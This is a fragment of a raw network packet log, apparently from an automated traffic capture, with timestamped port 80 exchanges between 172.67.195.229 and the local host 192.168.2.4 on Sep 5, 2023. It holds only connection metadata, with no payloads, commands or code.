                                                                                                                                                    Sep 5, 2023 13:03:11.264322996 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264368057 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264388084 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264388084 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264421940 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264450073 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264450073 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264463902 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264509916 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264534950 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264534950 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264549971 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264596939 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264600992 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264626026 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264645100 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264676094 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264688015 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264735937 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264785051 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264786959 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264833927 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264844894 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264844894 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264873981 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264923096 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264950037 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264950037 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264967918 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265012026 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265017033 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265017033 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265055895 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265063047 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265090942 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265100956 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265149117 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265192032 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265214920 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265214920 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265233994 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265254974 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265254974 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265280008 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265321016 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265324116 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265379906 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265434980 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265656948 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265788078 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.265815973 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265851974 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265872955 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265906096 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265934944 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265959978 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.265990019 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266037941 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266037941 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266062021 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266093969 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266138077 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266136885 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266182899 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266217947 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266231060 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266267061 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266267061 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266273975 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266304016 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266319990 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266361952 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266365051 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266396999 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266413927 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266448975 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266457081 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266499043 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266501904 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266544104 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266549110 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266602039 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266606092 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266653061 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266661882 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266697884 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266704082 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266741991 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266786098 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266802073 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266802073 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266829014 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266874075 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266894102 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266894102 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266895056 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266920090 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.266940117 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.266958952 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267004967 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267041922 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267052889 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267079115 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267079115 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267092943 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267141104 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267170906 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267170906 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267184973 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267214060 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267229080 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267277956 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267278910 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267311096 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267324924 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267371893 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267373085 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.267400026 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.267482996 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.302160978 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302197933 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302221060 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302251101 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302273989 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302297115 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302325964 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302355051 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.302360058 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.302360058 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.302458048 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.302458048 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.302458048 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.388876915 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.388997078 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389077902 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389144897 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389170885 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389172077 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389206886 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389257908 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389257908 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389276981 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389292002 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389333963 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389398098 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389435053 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389435053 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389481068 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389528036 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389539957 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389596939 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389602900 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389630079 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389663935 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.389688015 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.389740944 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.390315056 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.390393019 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.390436888 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.390451908 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.390470028 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.390507936 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.390539885 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.390597105 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.391725063 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.391887903 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.393393993 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393452883 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393492937 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393522978 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393526077 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.393558979 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.393564939 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393599033 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.393620014 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.393677950 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.393707037 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395430088 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395495892 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395544052 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395576954 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395611048 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395653009 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395693064 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395736933 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395781994 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395818949 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395868063 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395916939 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395962000 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.395998955 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396043062 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396080017 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396117926 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396245003 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396281958 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396323919 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396364927 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396409035 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396444082 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396538019 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396576881 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396651030 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396687031 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396747112 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396790981 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396828890 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396859884 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.396972895 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397023916 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397064924 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397099018 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397208929 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397242069 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397274971 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397360086 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397397995 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397434950 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397481918 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397525072 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397559881 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397594929 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397631884 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397758007 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397804976 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397844076 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397887945 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397926092 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.397965908 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398001909 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398034096 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398240089 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398277998 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398386955 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398426056 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398550987 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398590088 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398629904 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398664951 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398694992 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398819923 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398845911 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398865938 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398885012 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398905993 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.398983955 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399003029 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399079084 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399101973 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399122000 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399275064 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399317026 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399343014 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399363041 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399430990 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399537086 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399559021 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399630070 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399755955 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399780035 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399799109 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399818897 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399947882 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399975061 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.399998903 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400022984 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400043011 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400135040 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400161028 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400186062 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400222063 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400300026 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400327921 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400350094 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400378942 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400475979 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400551081 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400610924 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400630951 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400753975 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400778055 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400867939 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.400892019 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401010036 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401071072 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401144028 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401267052 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401292086 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401312113 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401371956 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401395082 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401465893 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401592016 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.401665926 CEST8049773172.67.195.229192.168.2.4
